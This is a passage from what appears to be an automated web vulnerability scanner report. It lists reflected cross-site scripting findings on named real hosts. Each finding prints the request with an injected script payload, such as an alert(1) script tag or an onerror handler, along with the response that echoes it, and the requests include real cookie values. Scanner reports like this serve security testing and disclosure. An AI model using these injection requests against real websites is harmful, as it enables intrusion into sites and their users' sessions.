Date: Mon, 12 Sep 2011 12:50:36 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 22597
Connection: keep-alive

jQuery16204978716284967959_1315849731747c780e<script>alert(1)</script>f8f059caaeb({
"content": [
[
{
"end_user_description": "Learn about SavannahNow.com!",
"read_only": 0,
"modified_timestamp": 1313094859,

...[SNIP]...
2.21. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 239ba<img%20src%3da%20onerror%3dalert(1)>b848b762356 was submitted in the REST URL parameter 8. This input was echoed as 239ba<img src=a onerror=alert(1)>b848b762356 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E239ba<img%20src%3da%20onerror%3dalert(1)>b848b762356?verbosity=9&non_secure=1&method=POST&callback=jQuery16204978716284967959_1315849731750&$amount=1&_=1315849743849 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:51:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 6912
Connection: keep-alive

jQuery16204978716284967959_1315849731750({
"content": [
{
"transaction_group_id": "e4585ae6dd3d11e09e70a1d588d6b83a",
"end_user": {
"read_only": 0,

...[SNIP]...
"end_user_title": "Checkin-SavannahNow"
}
],
"created_timestamp": 1315831871,
"end_user_login": "1B3C6937-8DDC-4B7E-95C5-7878A957141E239ba<img src=a onerror=alert(1)>b848b762356",
"level_summaries": [
{
"end_user_description": "You've earned Savannah Bucks just for visiting this page! Log in to keep your Bucks and re
...[SNIP]...
2.22. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 448ee<script>alert(1)</script>ac7a6816012 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&non_secure=1&method=POST&callback=jQuery16204978716284967959_1315849731750448ee<script>alert(1)</script>ac7a6816012&$amount=1&_=1315849743849 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:49 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 457
Connection: keep-alive

jQuery16204978716284967959_1315849731750448ee<script>alert(1)</script>ac7a6816012({
"content": "3",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"BDM-Reason-Phrase":
...[SNIP]...
2.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e412'%3balert(1)//85a26cf6ed2 was submitted in the $ parameter. This input was echoed as 8e412';alert(1)//85a26cf6ed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=8e412'%3balert(1)//85a26cf6ed2&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 631
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:8e412';alert(1)//85a26cf6ed2,746f2';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='8e412';alert(1)//85a26cf6ed2,746f2'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=8e412';alert(1)//85a26cf6ed2,746f2';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...
2.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb91"%3balert(1)//bc21aa44290 was submitted in the $ parameter. This input was echoed as feb91";alert(1)//bc21aa44290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=feb91"%3balert(1)//bc21aa44290&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:feb91";alert(1)//bc21aa44290,c46b4";expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236:305,232825,235949|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24:0,14#0,120:0,10#0,24;expires=Wed, 12 Oct 2011 12:48:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Content-Length: 6383
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='feb91";alert(1)//bc21aa44290,c46b4"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=feb91";alert(1)//bc21aa44290,c46b4";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


                                                                                                           
...[SNIP]...
2.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290ab'%3balert(1)//ed469f36d1b was submitted in the q parameter. This input was echoed as 290ab';alert(1)//ed469f36d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=290ab'%3balert(1)//ed469f36d1b&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:4:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:40 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='290ab';alert(1)//ed469f36d1b,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=290ab';alert(1)//ed469f36d1b,1a0a560b5ac81252e91
...[SNIP]...
2.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7baf9"%3balert(1)//41b4507dc6c was submitted in the q parameter. This input was echoed as 7baf9";alert(1)//41b4507dc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=7baf9"%3balert(1)//41b4507dc6c&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:4:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:40 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='7baf9";alert(1)//41b4507dc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=7baf9";alert(1)//41b4507dc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;



...[SNIP]...
2.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f500"%3balert(1)//a377cf4d1f4 was submitted in the $ parameter. This input was echoed as 8f500";alert(1)//a377cf4d1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=8f500"%3balert(1)//a377cf4d1f4&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:8f500";alert(1)//a377cf4d1f4,21990";expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='8f500";alert(1)//a377cf4d1f4,21990"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=8f500";alert(1)//a377cf4d1f4,21990";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


               
2.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 349bc'%3balert(1)//f49a54755fd was submitted in the $ parameter. This input was echoed as 349bc';alert(1)//f49a54755fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=349bc'%3balert(1)//f49a54755fd&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:349bc';alert(1)//f49a54755fd,e304a';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='349bc';alert(1)//f49a54755fd,e304a'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=349bc';alert(1)//f49a54755fd,e304a';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...
2.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9b1f'%3balert(1)//4f2061d893a was submitted in the q parameter. This input was echoed as b9b1f';alert(1)//4f2061d893a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=b9b1f'%3balert(1)//4f2061d893a&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
